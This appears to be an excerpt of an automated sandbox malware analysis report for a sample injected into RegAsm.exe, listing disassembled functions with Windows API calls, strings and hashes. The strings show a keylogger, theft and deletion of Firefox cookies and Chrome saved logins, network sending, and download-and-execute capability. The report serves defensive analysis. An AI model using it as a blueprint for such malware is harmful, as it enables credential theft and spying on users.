                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                          • GetLastError.KERNEL32 ref: 0041A84C
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                          • String ID:
                                          • API String ID: 3587775597-0
                                          • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                          • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                          • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                          • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                          • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                          • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                          • String ID: JD$JD$JD
                                          • API String ID: 745075371-3517165026
                                          • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                          • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                          • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                          • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                          • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                          • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 1164774033-405221262
                                          • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                          • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                          • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                          • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$Find$CreateFirstNext
                                          • String ID: 8SG$PXG$PXG$NG$PG
                                          • API String ID: 341183262-3812160132
                                          • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                          • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                          • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                          • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                          • GetLastError.KERNEL32 ref: 0040A328
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetMessageA.USER32 ref: 0040A376
                                          • TranslateMessage.USER32(?), ref: 0040A385
                                          • DispatchMessageA.USER32(?), ref: 0040A390
                                          Strings
                                          • Keylogger initialization failure: error , xrefs: 0040A33C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                          • String ID: Keylogger initialization failure: error
                                          • API String ID: 3219506041-952744263
                                          • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                          • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                          • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                          • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                          • String ID:
                                          • API String ID: 1888522110-0
                                          • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                          • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                          • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                          • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                          • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                          • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                          • API String ID: 2127411465-314212984
                                          • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                          • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                          • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                          • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                          APIs
                                          • _free.LIBCMT ref: 00449292
                                          • _free.LIBCMT ref: 004492B6
                                          • _free.LIBCMT ref: 0044943D
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                          • _free.LIBCMT ref: 00449609
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                          • String ID:
                                          • API String ID: 314583886-0
                                          • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                          • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                          • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                          • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                          APIs
                                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                          • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                          • API String ID: 1589313981-2876530381
                                          • Opcode ID: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                          • Opcode Fuzzy Hash: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                          APIs
                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                          • GetLastError.KERNEL32 ref: 0040BA93
                                          Strings
                                          • UserProfile, xrefs: 0040BA59
                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: DeleteErrorFileLast
                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                          • API String ID: 2018770650-1062637481
                                          • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                          • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                          • GetLastError.KERNEL32 ref: 004179D8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3534403312-3733053543
                                          • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                          • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                          • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                          • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00409293
                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00854950,00000010), ref: 004048E0
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                          • FindClose.KERNEL32(00000000), ref: 004093FC
                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                          • FindClose.KERNEL32(00000000), ref: 004095F4
                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                          • String ID:
                                          • API String ID: 1824512719-0
                                          • Opcode ID: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
                                          • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                          • Opcode Fuzzy Hash: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
                                          • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                          • String ID:
                                          • API String ID: 276877138-0
                                          • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                          • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                          • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                          • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                          • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                          • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                          APIs
                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                          • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                          • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                          • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID: SETTINGS
                                          • API String ID: 3473537107-594951305
                                          • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                          • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                          • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                          • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004096A5
                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstH_prologNext
                                          • String ID:
                                          • API String ID: 1157919129-0
                                          • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                          • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                          • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                          • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040884C
                                          • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                          • String ID:
                                          • API String ID: 1771804793-0
                                          • Opcode ID: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                          • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                          • Opcode Fuzzy Hash: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                          • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DownloadExecuteFileShell
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                          • API String ID: 2825088817-3056885514
                                          • Opcode ID: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                          • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                          • Opcode Fuzzy Hash: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                          • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$FirstNextsend
                                          • String ID: XPG$XPG
                                          • API String ID: 4113138495-1962359302
                                          • Opcode ID: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
